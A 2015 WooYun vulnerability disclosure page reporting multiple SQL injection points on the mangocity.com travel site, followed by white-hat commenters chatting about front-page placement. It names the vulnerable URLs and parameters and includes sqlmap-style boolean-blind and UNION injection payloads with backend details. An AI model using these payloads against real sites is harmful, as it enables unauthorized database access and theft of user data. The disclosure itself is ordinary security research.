当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123486

漏洞标题:芒果网主站多处SQL注入(涉及用户信息)

相关厂商:芒果网

漏洞作者: 路人甲

提交时间:2015-06-29 16:39

修复时间:2015-07-04 16:40

公开时间:2015-07-04 16:40

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-07-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

测试系统?

详细说明:

1、

http://www.mangocity.com/product/10506752p2.html?type=90&c=cholidayindexcontroller&m=comindex&d=grouptravel


Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=90 AND 1217=1217&c=cholidayindexcontroller&m=comindex&d=grouptravel
Type: UNION query
Title: MySQL UNION query (60) - 9 columns
Payload: type=-3025 UNION ALL SELECT 60,60,60,CONCAT(0x716b626a71,0x77445276794465757461,0x716a627871),60,60,60,60,60#&c=cholidayindexcontroller&m=comindex&d=grouptravel
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL >= 5.0.0


2、

1.jpg


2.jpg


3、

http://www1.mangocity.com/alliance/9953/600003/index.php?thirdpartid=100003295p2&c=productinfo_controller&m=index&d=freeline


参数thirdpartid

3.jpg


http://www.mangocity.com/index.php?fp=304%3A1&c=destination_controller&d=grouptravel&keyword=%E6%B5%99%E6%B1%9F&m=index&type=1


参数fp

4.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-04 16:40

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-29 16:47 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    哥 为嘛 中午和现在的都上首页啦 怎么我的是小厂商 不都是注入吗

  2. 2015-06-29 17:05 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    @牛 小 帅 大概是人家懂得低调吧

  3. 2015-06-29 17:07 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @Me_Fortune 表示好委屈 我小菜鸟容易嘛

  4. 2015-07-04 16:50 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    卧槽怎么忽略了,能补rank@疯狗

  5. 2015-07-04 20:48 | 墨迹 ( 路人 | Rank:10 漏洞数:1 | 为安全事业奋斗)

    @牛 小 帅 上首页真的很重要吗